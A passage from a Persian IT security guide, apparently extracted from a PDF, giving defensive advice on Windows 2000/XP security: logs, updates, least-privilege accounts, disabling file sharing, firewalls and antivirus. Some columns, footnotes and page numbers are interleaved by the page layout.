ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺮﺍﻱ ﻫﺮ ﺳﻴﺴﺘﻢ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻳـﻚ ﻓﺎﻳـﻞ
ﺛﺒﺖ ﻣﺠﺰﺍ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺭﺍ ﺑـﺎ
ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣـﺘﻦ ﺑﺨﻮﺍﻧﻴـﺪ ﻭ ﮔـﺎﻫﻲ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻭ
ﻗﺎﻟﺐﺑﻨﺪﻱ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ.
ﺛﺒﺘﻬﺎ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺎﻳﺪ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ .ﺩﺭ ﻋﻴﻦ
ﺣﺎﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻭ
ﻋﺎﺩﻱ ﻓﻌﺎﻝ ﻧﻜﻨﻴﺪ؛ ﺯﻳﺮﺍ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻭﻗﺖ ﺯﻳﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ
ﺛﺒﺖ ﻭ ﺑﺮﺭﺳﻲ ﺁﻧﻬﺎ ﺻﺮﻑ ﻛﻨﺪ ﻭ ﺣﺠﻤﻲ ﺍﺯ ﺩﻳﺴﻚ ﻧﻴﺰ ﺗﻮﺳـﻂ
ﺁﻧﻬﺎ ﺍﺷﻐﺎﻝ ﻣﻲﮔﺮﺩﺩ.
ﺍﮔﺮ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻗﻼﻡ ﻣـﺸﺮﻭﺡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﺭﺍ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺩﻭﺭﻩﺍﻱ ﻣﺮﻭﺭ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺒﻴﻨﻴـﺪ
ﺁﻳﺎ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋﺎﺩﻱ ﺭﺥ ﺩﺍﺩﻩ ﻳﺎ ﺧﻴﺮ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺛﺒﺘﻬﺎ ﺑﺎﻳﺪ
ﺑﮕﻮﻧــﻪﺍﻱ ﻧﮕﻬــﺪﺍﺭﻱ ﺷــﻮﻧﺪ ﻛــﻪ ﺩﺭﺻــﻮﺭﺕ ﻭﻗــﻮﻉ ﺍﺗﻔﺎﻗــﺎﺕ
ﻏﻴﺮﻃﺒﻴﻌﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺸﻒ ﺩﻗﻴﻘﺘﺮ ﺁﻧﭽـﻪ ﻛـﻪ
ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ.
٩٩
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻓﺼﻞ ﻫﺸﺘﻢ
ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ
ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windowsﭘﺮﺩﺍﺯﻧـﺪﺓ ) Intel x86ﻳـﺎ ﻣﻌﺎﺩﻟﻬـﺎﻱ
ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ
ﺁﻥ( ﺭﺍﻳﺠﺘﺮﻳﻦ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ
ﺍﺳﺖ .ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻥ
ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻳﻚ ﻛـﺎﺭﺑﺮ ﺑـﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ،ﻧﺮﻡﺍﻓﺰﺍﺭ sharewareﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ
ﺑﺮﺍﻱ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﻣﺸﺎﺑﻪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺠﺎ
ﻫﻢ ﺍﻓﺮﺍﺩ ﻣﺘﺨﺼﺺ ﺑﻪ ﺳﺨﺘﻲ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣـﺎ ﻣﺘﺨﺼـﺼﻴﻦ
ﺯﻳﺎﺩﻱ ﺑﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑـﺎ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ
ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﺭﻗﺒﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﻌﺪ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺑـﺎ ﻫـﻢ
ﺭﻗﺎﺑﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺧـﻮﺩ ﺑﺎﻋـﺚ ﺗﻨـﻮﻉ ﻣﺤـﺼﻮﻻﺕ ﻭ
ﻗﻴﻤﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﭘﺎﻳﻴﻦ ﺁﻧﻬﺎ ﺷﺪﻩ ﺍﺳﺖ.
ﺗﻤﺎﻣﻲ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻗﺎﺑﻞ
ﺍﻋﻤﺎﻝ ﺍﺳﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫـﺴﺘﻨﺪ ﺑﺎﻳـﺪ
ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ.
Windowsﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘـﻲ ﻭﺿـﻌﻴﺖ ﭼﻨـﺪﺍﻥ ﺟـﺎﻟﺒﻲ ﻧـﺪﺍﺭﺩ.
ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ١١٧ﺑﺎ ﻣﻼﺣﻈـﺔ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩ ﻭ ﻫﺮﭼﻨﺪ ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺁﻥ
) Windows 2000ﻭ Windows XPﻭ (...ﺑﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ
ﭘﺮﺩﺍﺧﺘﻪ ﺷﺪﻩ ،ﺍﻣﺎ ﻫﻨﻮﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﻴﺮ
ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﺮﺩﻧـﺪ
ﻛﻤﻚ ﺍﻧﺪﻛﻲ ﻧﻤﻮﺩﻩ ﺍﺳﺖ .ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺗﻮﺟـﻪ
ﺯﻳﺎﺩﻱ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺷﺖ .ﺍﻟﺒﺘﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ
ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧـﺪ ،ﺑـﻮﻳﮋﻩ ﺁﻧﻜـﻪ ﺍﻳـﻦ ﺷـﺮﻛﺖ ﺗﻮﺟـﻪ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ
ﺍﺷــﻜﺎﻻﺕ ﻣﻮﺟــﻮﺩ ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﭼﻨﺪﺭﺳــﺎﻧﻪﺍﻱ ﻭ ﺩﻳﮕــﺮ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺧﻮﺩ ﻣﻌﻄﻮﻑ ﺩﺍﺷﺘﻪ ﺍﺳﺖ.
ﻻ ﺑﺎﻋﺚ ﺑـﺎﻻ
ﻋﻤﻠﻜﺮﺩ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺭﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺑﻤﻨﻈﻮﺭ
ﺁﺳﺎﻥ ﻛﺮﺩﻥ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﺍﺯ ﺍﺑﺰﺍﺭ ،ﺳﻴـﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ
117 O.S. Kernel
ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﺍﮔﺮ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﺎﻓﻲ ﺩﺍﺭﻳـﺪ ،ﺑـﺮﺍﻱ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪﺩﺍﺷـﺘﻦ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﺎ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ServicePackﻫـﺎ
ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ١١٨ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ .ﺩﺭ
ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﺑــﺮﺍﻱ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ Windowsﺭﺍ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ )ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ
ﻧﺴﺒﺖ ﺑﻪ Service Packﻫﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﻨﺪ(.
ﺍﮔــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺍﺯ ﻃﺮﻳــﻖ ﭘﺎﻳﮕــﺎﻩ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ
ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑﺮﺍﻳﺘــﺎﻥ ﺍﻣﻜﺎﻧﭙــﺬﻳﺮ ﻧﻴــﺴﺖ ﻣــﻲﺗﻮﺍﻧﻴــﺪ
ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ ﺍﺯ ﻣﺮﻛــﺰ download
ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ١١٩ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ.
ﺷﺎﻳﺪ ISPﺷﻤﺎ ﻳﺎ ﺳﺎﻳﺮ ﻓﺮﺍﻫﻢﺁﻭﺭﻧﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺘﻮﺍﻧﻨـﺪ
ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ ﻣﻨﺘـﺸﺮﺷﺪﻩ ﺭﺍ downloadﻭ ﺭﻭﻱ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺗﻮﺯﻳﻊ ﻛﻨﻨﺪ .ﺍﮔﺮﭼﻪ ﻣﻨـﺎﺑﻊ ﻗﺎﺑـﻞﺗـﻮﺟﻬﻲ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﺍﻣﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ
ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ Windowsﺩﺭ ﻗﺎﻟـﺐ ﺧـﺪﻣﺎﺗﻲ ﺑـﻪ ﻧـﺎﻡ
Software Update Servicesﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ
Windows 2000ﺩﺭ ﭘﺎﻳﮕــﺎﻩ ﺯﻳــﺮ ﻗﺎﺑــﻞ ﺩﺳﺘﺮﺳــﻲ
ﺍﺳﺖ:
118 http://windowsupdate.microsoft.com
119 http://www.microsoft.com/downloads
ﺑﺨﺶ ﺩﻭﻡ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻣﺒﺘﻨﻲ ﺑﺮ Windows
ﭼﻨﺪﻳﻦ ﺯﻳﺮﺳﻴﺴﺘﻢ ﻭ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﻪ ﺩﻟﻴﻞ ﻛﺜﺮﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺰ ﺗﻌﺪﺩ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ،ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ
Windowsﺑﻪ ﺍﻫﺪﺍﻑ ﺍﺻﻠﻲ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎﻧﻲ ﻛﻪ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎﻳﻲ
ﻣﺜﻞ ﻭﻳﺮﻭﺱ ،ﻛﺮﻡ ﻭ ﺗـﺮﻭﺍ ﻣﻨﺘـﺸﺮ ﻣـﻲﻛﺮﺩﻧـﺪ ﺗﺒـﺪﻳﻞ ﺷـﺪﻧﺪ.
ﻭﺍﺳﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜﻲ ﻛـﺎﺭﺑﺮ ﺩﺭ Windowsﺑـﺴﻴﺎﺭ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ
ﻫﺴﺘﻨﺪ ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻣﻴﻠﻴﻮﻧﻬﺎ ﻧﻔﺮ ﺑﺎ ﺩﺍﻧﺶ ﻓﻨـﻲ ﺍﻧـﺪﻙ ﺗﻮﺍﻧـﺎﻳﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﺭﻭﺵ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻛـﺎﺭﺑﺮ ﻭﻗﺘـﻲ ﺩﺭ
ﻛﻨﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ
ﺑﺮ Windowsﺭﺍ ﻣﺴﺘﻌﺪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﺪ.
١٠٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
http://www.microsoft.com/windows2000
/windowsupdate/sus/
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ Windows 2000 ،Windows NT
ﻭ XP
Windowsﻛــﻪ ﺍﺯ ﻗﺎﺑﻠﻴــﺖ ﭼﻨــﺪﻛﺎﺭﺑﺮﻱ
١٢٠
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﻫـﻴﭻ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻏﻴﺮ ﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺍﺳـﺖ.
ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﺭﻣﺰ
ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ -ﺑﺮ ﺍﺳﺎﺱ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﺳﻮﻡ ﻫﻤﻴﻦ
ﺑﺨﺶ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ -ﺑﺮﺍﻱ ﺧـﻮﺩ ﺑﺮﮔﺰﻳـﺪﻩ ﺍﻧـﺪ .ﺑـﻪ
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺁﻧﻬﺎ ﺍﺳـﺖ ﺩﺍﺩﻩ
ﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺣﺘﻲ ﺍﮔﺮ ﺗﻨﻬﺎ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺗﻮﺳـﻂ
ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﺧﻮﺩ ﺭﺍﻫﺒﺮﻱ ﺷﻮﺩ ،ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ
ﺭﻭﺯﻣﺮﻩ ﻭ ﻣﻌﻤﻮﻟﻲ ﺧﻮﺩ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﺪ.
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ
ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ
١٢٢
ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻤـﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷـﺒﻜﻪ ﻓﻌـﺎﻝ
ﻫﺴﺘﻨﺪ ﺗﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺑﺮﻗـﺮﺍﺭ
ﺷﻮﺩ .ﺍﮔﺮ ﺩﺭ ﺷﺮﻛﺖ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻧﺪﺍﺭﻳـﺪ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ
ﻛﺎﺭﺑﺮﺩ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﻧـﺼﺐ ﻛﻨﻴـﺪ .ﻧـﺴﺨﻪﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺍﻳـﻦ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ .ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ ﺑـﻪﺭﻭﺯ
ﻧﮕﻬﺪﺍﺭﻳﺪ .ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺑﮕﻮﻧـﻪ ﺍﻱ
ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ
ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ.
ﺿﺪﻭﻳﺮﻭﺱ
ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﺍﺷﺘﺮﺍﻙ ﺧﺪﻣﺎﺕ ﭼﺎﭖ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻏﻴﺮﻓﻌـﺎﻝ ﺷـﺪﻩﺍﻧـﺪ.
ﻣﺮﺍﺣﻞ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ Windows Helpﻭ ﭘﺎﻳﮕـﺎﻩ
ﺍﻃﻼﻉﺭﺳـﺎﻧﻲ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ
ﻣﻲﺑﺎﺷﺪ .ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻋﺒـﺎﺭﺕ ﺯﻳـﺮ ﺭﺍ ﺟـﺴﺘﺠﻮ ﻛﻨﻴـﺪ:
" "disable file sharing xxﻛـﻪ ﺩﺭ ﺁﻥ xxﻧـﺴﺨﺔ
ﻼ XPﻳﺎ .2000ﺍﮔـﺮ ﺍﺯ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ؛ ﻣﺜ ﹰ
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﻫـﻴﭻ
ﺍﻣﺘﻴﺎﺯ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻧﻴﺴﺖ.
ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ
ﺳﺨﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺩﻳﮕﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ
ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ NTFSﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
١٢١
ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ
ﻛﻨﻴﺪ .ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ
ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ
ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ
ﻣﻲﻛﻨﻨﺪ .ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ.
ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ
